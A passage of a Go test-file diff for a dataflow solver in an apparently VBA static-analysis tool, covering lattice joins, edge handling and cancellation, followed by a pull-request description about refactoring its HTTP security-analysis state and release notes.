+				t.Fatalf("changed IDs = %#v, want [%d]", changed, url)
+			}
+			changed = changed[:0]
+			if left.JoinFrom(right.View(), lattice, &changed) {
+				t.Fatalf("repeating join changed state: %#v", changed)
+			}
+			if len(changed) != 0 {
+				t.Fatalf("repeating join reported IDs: %#v", changed)
+			}
+		})
+	}
+
+	// A join must report every changed slot in deterministic SymbolID order,
+	// including a slot that was previously explicit absence.
+	left := NewState[taggedScalar](env.Layout())
+	right := NewState[taggedScalar](env.Layout())
+	left.Set(object, taggedScalar{tag: scalarAbsent})
+	right.Set(object, taggedScalar{tag: scalarKnown, value: "object"})
+	right.Set(credential, taggedScalar{tag: scalarUnknown})
+	changed := make([]SymbolID, 0, 2)
+	if !left.JoinFrom(right.View(), lattice, &changed) {
+		t.Fatal("multi-slot scalar join did not report changes")
+	}
+	if !reflect.DeepEqual(changed, []SymbolID{credential, object}) {
+		t.Fatalf("multi-slot changed IDs = %#v, want [%d %d]", changed, credential, object)
+	}
+}
+
 func TestSolverDeterministicAndExceptionalEdgesUseInput(t *testing.T) {
 	env := NewEnvironment([]string{"value"})
 	index, err := NewIndex(testGraph())
@@ -129,6 +275,62 @@ func TestSolverDeterministicAndExceptionalEdgesUseInput(t *testing.T) {
 	}
 	if got, ok := one.State(3, 0).Value(value); !ok || got != 4 {
 		t.Fatalf("join result = %d, %v", got, ok)
+	}
+}
+
+func TestSolverUncertainEdgesUseInputWhileNormalEdgesUseOutput(t *testing.T) {
+	index, err := NewIndex(cfg.Graph{
+		Blocks: []cfg.Block{
+			{ID: 0, Kind: cfg.BlockEntry},
+			{ID: 1, Kind: cfg.BlockStatement},
+			{ID: 2, Kind: cfg.BlockNormalExit},
+			{ID: 3, Kind: cfg.BlockNormalExit},
+		},
+		Edges: []cfg.Edge{
+			{ID: 0, From: 0, To: 1, Kind: cfg.EdgeFallthrough, Class: cfg.EdgeNormal},
+			{ID: 1, From: 1, To: 2, Kind: cfg.EdgeUnknown, Class: cfg.EdgeNormal, Uncertain: true},
+			{ID: 2, From: 1, To: 3, Kind: cfg.EdgeFallthrough, Class: cfg.EdgeNormal},
+		},
+		Entry: 0,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	env := NewEnvironment([]string{"value"})
+	value, _ := env.Symbol("value")
+	gotCandidates := map[cfg.EdgeID]int{}
+	solver, err := NewSolver[int](index, env, maxLattice{}, []Lane[int]{{
+		Initialize: func(_ context.Context, _ LaneOrdinal, state *State[int]) error {
+			state.Set(value, 1)
+			return nil
+		},
+		Transfer: func(_ context.Context, _ LaneOrdinal, block BlockOrdinal, in StateView[int], out *State[int]) error {
+			out.CloneFrom(in, nil)
+			if block == 1 {
+				out.Set(value, 2)
+			}
+			return nil
+		},
+		Edge: func(_ context.Context, _ LaneOrdinal, edge Edge, _ StateView[int], _ StateView[int], candidate *State[int]) error {
+			got, ok := candidate.View().Value(value)
+			if !ok {
+				t.Fatalf("edge %d candidate lost value", edge.ID)
+			}
+			gotCandidates[edge.ID] = got
+			return nil
+		},
+	}})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := solver.Solve(); err != nil {
+		t.Fatal(err)
+	}
+	if gotCandidates[1] != 1 {
+		t.Fatalf("uncertain edge candidate = %d, want predecessor input 1", gotCandidates[1])
+	}
+	if gotCandidates[2] != 2 {
+		t.Fatalf("normal edge candidate = %d, want transfer output 2", gotCandidates[2])
 	}
 }
 
@@ -313,6 +515,34 @@ func TestSolverCancellationDoesNotPublishPartialResult(t *testing.T) {
 	}
 	if _, err := solver.SolveContext(ctx); err != context.Canceled {
 		t.Fatalf("cancellation error = %v", err)
+	}
+}
+
+func TestSolverCancellationDuringTransferDoesNotPublishPartialResult(t *testing.T) {
+	env := NewEnvironment([]string{"value"})
+	index, err := NewIndex(testGraph())
+	if err != nil {
+		t.Fatal(err)
+	}
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	value, _ := env.Symbol("value")
+	solver, err := NewSolver[int](index, env, maxLattice{}, []Lane[int]{{
+		Initialize: func(_ context.Context, _ LaneOrdinal, state *State[int]) error {
+			state.Set(value, 1)
+			return nil
+		},
+		Transfer: func(_ context.Context, _ LaneOrdinal, _ BlockOrdinal, in StateView[int], out *State[int]) error {
+			out.CloneFrom(in, nil)
+			cancel()
+			return nil
+		},
+	}})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := solver.SolveContext(ctx); err != context.Canceled {
+		t.Fatalf("transfer cancellation error = %v", err)
 	}
 }
 

--- a/internal/analyze/semanticstate/semanticstate_test.go
+++ b/internal/analyze/semanticstate/semanticstate_test.go
@@ -541,8 +541,12 @@ func TestSolverCancellationDuringTransferDoesNotPublishPartialResult(t *testing.
 	if err != nil {
 		t.Fatal(err)
 	}
-	if _, err := solver.SolveContext(ctx); err != context.Canceled {
+	result, err := solver.SolveContext(ctx)
+	if err != context.Canceled {
 		t.Fatalf("transfer cancellation error = %v", err)
+	}
+	if got, ok := result.State(0, 0).Value(value); ok {
+		t.Fatalf("canceled solve published state: %d", got)
 	}
 }
 


### PR DESCRIPTION
## Summary

- Replace the HTTP compatibility slot that carried a full nested `httpAnalysisState` with revision-local indexed scalar facts and in-place lattice joins.
- Keep immutable HTTP declarations and identities in the solver environment, while transfers update only the affected slots and report changed symbols to the worklist.
- Separate post-convergence evidence replay from semantic fixed-point state so recognized clients, TLS options, credentials, timeout checks, module constants, download/execute flows, and VBA224 duplicate suppression retain their existing diagnostics and ordering.
- Prepare the `v0.31.0` changelog entry. No public CLI, JSON, LSP, or diagnostic contract changes are intended.

## Release notes

The `v0.31.0` section records the compact semantic-state solver milestones already on `main`, including the HTTP scalarization completed here. The release remains tag-driven; this PR does not create or publish a tag.

## Compatibility

Batch and realtime result ordering, CFG edge handling, cancellation, single-threaded execution, unknown/absence joins, alias behavior, redaction, and VBA224 duplicate suppression are preserved. Array source-line and edge-refinement paths remain outside this follow-up.

## Tests

- `rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 test ./...`
- `rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 test -race ./internal/analyze`
- `rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 test -race ./internal/analyze/semanticstate`
- `rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 vet ./...`
- `rtk powershell -NoProfile -ExecutionPolicy Bypass -File .\scripts\dev\go.ps1 build ./...`
- `rtk dotnet test bridge/dotnet/tests/Xlflow.ExcelBridge.Tests/Xlflow.ExcelBridge.Tests.csproj --configuration Release --no-restore` (429 passed)
- `rtk task corpus:test` (run twice; no snapshot changes)
- `rtk task corpus:metrics`
- `rtk pnpm format:check`
- `rtk pnpm docs:check`
- `rtk goreleaser check --config .goreleaser.yaml`
- GoReleaser Windows snapshot with the MSYS2 UCRT64 CGO toolchain, followed by extracted `xlflow.exe --help`/`version` and bridge-artifact smoke checks.

## Related issues

Closes #720. Follow-up performance investigation: #729.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **Improvements**
  - Improved HTTP security analysis performance and memory efficiency across branches, loops, aliases, and complex control flow.
  - Preserved diagnostic behavior while strengthening detection of credentials, timeouts, sensitive data, TLS issues, downloads, and executable paths.
  - Added deterministic results and more reliable evidence reporting.
  - Improved semantic query reuse and CFG views; updated the tree-sitter-vba parser.

- **Documentation**
  - Updated release notes, architecture specifications, and verification records.

- **Testing**
  - Added regression, differential, benchmark, and cancellation coverage for HTTP analysis.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->